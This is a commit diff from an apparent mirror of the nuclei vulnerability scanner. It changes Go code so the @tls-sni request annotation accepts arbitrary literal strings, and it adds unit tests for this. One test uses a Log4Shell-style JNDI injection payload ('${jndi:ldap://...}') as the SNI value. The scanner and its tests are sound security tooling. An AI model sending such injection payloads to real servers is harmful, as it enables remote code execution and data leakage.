mirror of https://github.com/daffainfo/nuclei.git
http: support arbitrary strings on TLS SNI annotation (#4462)
parent
73982ac757
commit
7da3921c12
|
@ -2,6 +2,7 @@ package http
|
|||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"net"
|
||||
"regexp"
|
||||
"strings"
|
||||
|
@ -87,10 +88,8 @@ func (r *Request) parseAnnotations(rawRequest string, request *retryablehttp.Req
|
|||
if hosts := reSniAnnotation.FindStringSubmatch(rawRequest); len(hosts) > 0 {
|
||||
value := strings.TrimSpace(hosts[1])
|
||||
value = stringsutil.TrimPrefixAny(value, "http://", "https://")
|
||||
if idxForwardSlash := strings.Index(value, "/"); idxForwardSlash >= 0 {
|
||||
value = value[:idxForwardSlash]
|
||||
}
|
||||
|
||||
var literal bool
|
||||
switch value {
|
||||
case "request.host":
|
||||
value = request.Host
|
||||
|
@ -99,9 +98,15 @@ func (r *Request) parseAnnotations(rawRequest string, request *retryablehttp.Req
|
|||
value = interactshURL
|
||||
}
|
||||
overrides.interactshURLs = append(overrides.interactshURLs, value)
|
||||
default:
|
||||
literal = true
|
||||
}
|
||||
ctx := context.WithValue(request.Context(), fastdialer.SniName, value)
|
||||
request = request.Clone(ctx)
|
||||
|
||||
if literal {
|
||||
request.TLS = &tls.ConnectionState{ServerName: value}
|
||||
}
|
||||
modified = true
|
||||
}
|
||||
|
||||
|
|
|
@ -10,6 +10,37 @@ import (
|
|||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestRequestParseAnnotationsSNI(t *testing.T) {
|
||||
t.Run("compliant-SNI-value", func(t *testing.T) {
|
||||
req := &Request{connConfiguration: &httpclientpool.Configuration{}}
|
||||
rawRequest := `@tls-sni: github.com
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}`
|
||||
|
||||
httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
|
||||
require.Nil(t, err, "could not create http request")
|
||||
|
||||
overrides, modified := req.parseAnnotations(rawRequest, httpReq)
|
||||
require.True(t, modified, "could not apply request annotations")
|
||||
require.Equal(t, "github.com", overrides.request.TLS.ServerName)
|
||||
require.Equal(t, "example.com", overrides.request.URL.Hostname())
|
||||
})
|
||||
t.Run("non-compliant-SNI-value", func(t *testing.T) {
|
||||
req := &Request{connConfiguration: &httpclientpool.Configuration{}}
|
||||
rawRequest := `@tls-sni: ${jndi:ldap://${hostName}.test.com}
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}`
|
||||
|
||||
httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
|
||||
require.Nil(t, err, "could not create http request")
|
||||
|
||||
overrides, modified := req.parseAnnotations(rawRequest, httpReq)
|
||||
require.True(t, modified, "could not apply request annotations")
|
||||
require.Equal(t, "${jndi:ldap://${hostName}.test.com}", overrides.request.TLS.ServerName)
|
||||
require.Equal(t, "example.com", overrides.request.URL.Hostname())
|
||||
})
|
||||
}
|
||||
|
||||
func TestRequestParseAnnotationsTimeout(t *testing.T) {
|
||||
t.Run("positive", func(t *testing.T) {
|
||||
request := &Request{
|
||||
|
|
Loading…
Reference in New Issue